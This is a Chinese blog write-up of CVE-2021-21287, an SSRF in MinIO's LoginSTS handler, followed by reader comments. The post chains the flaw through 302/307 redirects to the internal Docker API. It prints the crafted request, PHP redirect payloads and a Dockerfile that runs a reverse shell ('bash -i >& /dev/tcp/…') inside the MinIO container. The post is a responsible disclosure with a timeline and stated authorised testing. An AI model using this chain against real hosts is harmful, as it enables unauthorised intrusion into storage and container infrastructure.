CVE-2021-21287: 容器与云的碰撞——一次对MinIO的测试

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程。本文提到的漏洞《MinIO未授权SSRF漏洞(CVE-2021-21287)》已经修复,也请读者勿使用该漏洞进行未授权测试,否则作者不承担任何责任

(English edition)

随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,MinIO就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k星星。

我平时会将一些数据部署在MinIO中,在CI、Dockerfile等地方进行使用。本周就遇到了一个环境,其中发现一个MinIO,其大概情况如下:

  • MinIO运行在一个小型Docker集群(swarm)中
  • MinIO开放默认的9000端口,外部可以访问,地址为http://192.168.227.131:9000,但是不知道账号密码
  • 192.168.227.131这台主机是CentOS系统,默认防火墙开启,外部只能访问9000端口,dockerd监听在内网的2375端口(其实这也是一个swarm管理节点,swarm监听在2377端口)

本次测试目标就是窃取MinIO中的数据,或者直接拿下。

0x01 MinIO代码审计

既然我们选择了从MinIO入手,那么先了解一下MinIO。其实我前面也说了,因为平时用到MinIO的时候很多,所以这一步可以省略了。其使用Go开发,提供HTTP接口,而且还提供了一个前端页面,名为“MinIO Browser”。当然,前端页面就是一个登陆接口,不知道口令无法登录。

那么从入口点(前端接口)开始对其进行代码审计吧。

在User-Agent满足正则.*Mozilla.*的情况下,我们即可访问MinIO的前端接口,前端接口是一个自己实现的JsonRPC:

image-20210124211255239.png

我们感兴趣的就是其鉴权的方法,随便找到一个RPC方法,可见其开头调用了webRequestAuthenticate,跟进看一下,发现这里用的是jwt鉴权:

image-20210124211738748.png

jwt常见的攻击方法主要有下面这几种:

  • 将alg设置为None,告诉服务器不进行签名校验
  • 如果alg为RSA,可以尝试修改为HS256,即告诉服务器使用公钥进行签名的校验
  • 爆破签名密钥

查看MinIO的JWT模块,发现其中对alg进行了校验,只允许以下三种签名方法:

image-20210124212344593.png

这就堵死了前两种绕过方法,爆破当然就更别说了,通常仅作为没办法的情况下的手段。当然,MinIO中使用用户的密码作为签名的密钥,这个其实会让爆破变地简单一些。

鉴权这块没啥突破,我们就可以看看,有哪些RPC接口没有进行权限验证。

很快找到了一个接口,LoginSTS。这个接口其实是AWS STS登录接口的一个代理,用于将发送到JsonRPC的请求转变成STS的方式转发给本地的9000端口(也就还是他自己,因为它是兼容AWS协议的)。

简化其代码如下:

// LoginSTS - STS user login handler.
func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {
    ctx := newWebContext(r, args, "WebLoginSTS")

    v := url.Values{}
    v.Set("Action", webIdentity)
    v.Set("WebIdentityToken", args.Token)
    v.Set("Version", stsAPIVersion)

    scheme := "http"
    // ...

    u := &url.URL{
        Scheme: scheme,
        Host:   r.Host,
    }

    u.RawQuery = v.Encode()
    req, err := http.NewRequest(http.MethodPost, u.String(), nil)
    // ...
}

没发现有鉴权上的绕过问题,但是发现了另一个有趣的问题。这里,MinIO为了将请求转发给“自己”,就从用户发送的HTTP头Host中获取到“自己的地址”,并将其作为URL的Host构造了新的URL。

这个过程有什么问题呢?

因为请求头是用户可控的,所以这里可以构造任意的Host,进而构造一个SSRF漏洞。

我们来实际测试一下,向http://192.168.227.131:9000发送如下请求,其中Host的值是我本地ncat开放的端口(192.168.1.142:4444):

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.142:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 80

{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}

成功收到请求:

image-20210124215812861.png

可以确定这里存在一个SSRF漏洞了。

0x02 升级SSRF漏洞

仔细观察,可以发现这是一个POST请求,但是Path和Body都没法控制,我们能控制的只有URL中的一个参数WebIdentityToken

但是这个参数经过了URL编码,无法注入换行符等其他特殊字符。这样就比较鸡肋了,如果仅从现在来看,这个SSRF只能用于扫描端口。我们的目标当然不仅限于此。

幸运的是,Go默认的http库会跟踪302跳转,而且不论是GET还是POST请求。所以,我们这里可以302跳转来“升级”SSRF漏洞。

使用PHP来简单地构造一个302跳转:

<?php
header('Location: http://192.168.1.142:4444/attack?arbitrary=params');

将其保存成index.php,启动一个PHP服务器:

image-20210124225105734.png

将Host指向这个PHP服务器。这样,经过一次302跳转,我们收获了一个可以控制完整URL的GET请求:

image-20210124224837443.png

放宽了一些限制,结合前面我对这套内网的了解,我们可以尝试攻击Docker集群的2375端口。

2375是Docker API的接口,使用HTTP协议通信,默认不会监听TCP地址,这里可能是为了方便内网其他机器使用所以开放在内网的地址里了。那么,我们是否可以通过SSRF来攻击这个接口呢?

在Docker未授权访问的情况下,我们通常可以使用docker rundocker exec来在目标容器里执行任意命令(如果你不了解,可以参考这篇文章)。但是翻阅Docker的文档可知,这两个操作的请求是POST /containers/createPOST /containers/{id}/exec

两个API都是POST请求,而我们可以构造的SSRF却是一个GET的。怎么办呢?

0x03 再次升级SSRF漏洞

还记得我们是怎样获得这个GET型的SSRF的吗?通过302跳转,而接受第一次跳转的请求就是一个POST请求。不过我们没法直接利用这个POST请求,因为他的Path不可控。

如何构造一个Path可控的POST请求呢?

我想到了307跳转,307跳转是在RFC 7231中定义的一种HTTP状态码,描述如下:

The 307 (Temporary Redirect) status code indicates that the target resource resides temporarily under a different URI and the user agent MUST NOT change the request method if it performs an automatic redirection to that URI.

307跳转的特点就是不会改变原始请求的方法,也就是说,在服务端返回307状态码的情况下,客户端会按照Location指向的地址发送一个相同方法的请求。

我们正好可以利用这个特性,来获得POST请求。

简单修改一下之前的index.php:

<?php
header('Location: http://192.168.1.142:4444/attack?arbitrary=params', false, 307);

尝试SSRF攻击,收到了预期的请求:

image-20210124232243242.png

Bingo,获得了一个POST请求的SSRF,虽然没有Body。

0x04 攻击Docker API

回到Docker API,我发现现在仍然没法对run和exec两个API做利用,原因是,这两个API都需要在请求Body中传输JSON格式的参数,而我们这里的SSRF无法控制Body。

继续翻越Docker文档,我发现了另一个API,Build an image

image-20210124232945843.png

这个API的大部分参数是通过Query Parameters传输的,我们可以控制。阅读其中的选项,发现它可以接受一个名为remote的参数,其说明为:

A Git repository URI or HTTP/HTTPS context URI. If the URI points to a single text file, the file’s contents are placed into a file called Dockerfile and the image is built from that file. If the URI points to a tarball, the file is downloaded by the daemon and the contents therein used as the context for the build. If the URI points to a tarball and the dockerfile parameter is also specified, there must be a file with the corresponding path inside the tarball.

这个参数可以传入一个Git地址或者一个HTTP URL,内容是一个Dockerfile或者一个包含了Dockerfile的Git项目或者一个压缩包。

也就是说,Docker API支持通过指定远程URL的方式来构建镜像,而不需要我在本地写入一个Dockerfile。

所以,我尝试编写了这样一个Dockerfile,看看是否能够build这个镜像,如果可以,那么我的4444端口应该能收到wget的请求:

FROM alpine:3.13
RUN wget -T4 http://192.168.1.142:4444/docker/build

然后修改前面的index.php,指向Docker集群的2375端口:

<?php
header('Location: http://192.168.227.131:2375/build?remote=http://192.168.1.142:4443/Dockerfile&nocache=true&t=evil:1', false, 307);

进行SSRF攻击,等待了一会儿,果然收到请求了:

image-20210124233853616.png

完美,我们已经可以在目标集群容器里执行任意命令了。

0x05 拿下MinIO容器

此时离我们的目标,拿下MinIO,还差一点点,后面的攻击其实就比较简单了。

因为现在可以执行任意命令,我们就不会再受到SSRF漏洞的限制,可以直接反弹一个shell,或者可以直接发送任意数据包到Docker API,来访问容器。经过一顿测试,我发现MinIO虽然是运行的一个service,但实际上就只有一个容器。

所以我编写了一个自动化攻击MinIO容器的脚本,并将其放在了Dockerfile中,让其在Build的时候进行攻击,利用docker exec在MinIO的容器里执行反弹shell的命令。这个Dockerfile如下:

FROM alpine:3.13

RUN apk add curl bash jq

RUN set -ex && \
    { \
        echo '#!/bin/bash'; \
        echo 'set -ex'; \
        echo 'target="http://192.168.227.131:2375"'; \
        echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; \
        echo 'for item in ${jsons[@]}; do'; \
        echo '    name=$(echo $item | base64 -d | jq -r ".Image")'; \
        echo '    if [[ "$name" == *"minio/minio"* ]]; then'; \
        echo '        id=$(echo $item | base64 -d | jq -r ".Id")'; \
        echo '        break'; \
        echo '    fi'; \
        echo 'done'; \
        echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{\"Cmd\": [\"bash\", \"-c\", \"bash -i >& /dev/tcp/192.168.1.142/4444 0>&1\"]}" | jq -r ".Id")'; \
        echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; \
    } | bash

这个脚本所干的事情比较简单,一个是遍历了所有容器,如果发现其镜像的名字中包含minio/minio,则认为这个容器就是MinIO所在的容器。拿到这个容器的Id,用exec的API,在其中执行反弹shell的命令。

最后成功拿到MinIO容器的shell

当然,我们也可以通过Docker API来获取集群权限,这不在本文的介绍范围内了。

0x06 总结

本次测试开始于一个MinIO开放的9000端口,通过代码审计,挖掘到了MinIO的一个SSRF漏洞,又利用这个漏洞攻击内网的Docker API,最终拿到了MinIO的权限。

本文所涉及的漏洞已经提交给MinIO官方并修复,以下是时间线:

  • Jan 23, 2021, 9:11 PM - 漏洞提交
  • Jan 24, 2021, 3:06 AM - 漏洞确认
  • Jan 26, 2021, 2:15 AM - 修复已被合并进主线分支
  • Jan 30, 2021, 11:22 AM - 漏洞公告和新版本被发布
  • Feb 2, 2021 01:10 AM - 确认编号 - CVE-2021-21287

赞赏

喜欢这篇文章?打赏1元

评论

站元素主机 回复

感谢分享 赞一个

York 回复

想请教一下,如果内网没有docker集群,这个漏洞该如何利用?至少扫端口该怎么扫?没有任何回显,不知道该怎么操作了。。

phithon 回复

@York 有XSS盲打的经验吗,Payload填进去点提交,能不能收到结果全凭运气。

OuO 回复

p师傅,容器为什么能访问到docker的API啊,我复现这个失败了,MinIO报错无法访问docker API,connect: no route to host

OuO 回复

@OuO 防火墙忘记关了打扰了- -

路过 回复

还是比较鸡肋的。

phithon 回复

@路过 长期致力于鸡肋漏洞的回收再利用

sqx 回复

@phithon @York 如果内网没有docker集群,这个漏洞该如何利用

phithon 回复

@sqx 不是所有漏洞都可以利用。比如你扫到一个SQL注入漏洞,但是裤子里啥也没有,也无法getshell,也只能另寻他法。

sqx 回复

@phithon 感谢指点🙇‍

guillermo_best_6@hotmail.com 回复

嘿!恭喜您的报告。我想知道端口2375是否已关闭,如何利用SSRF至少实现内部端口扫描或AWS机密泄露。

非常感谢

Annevi 回复

学习了

068089dy 回复

666牛逼

captcha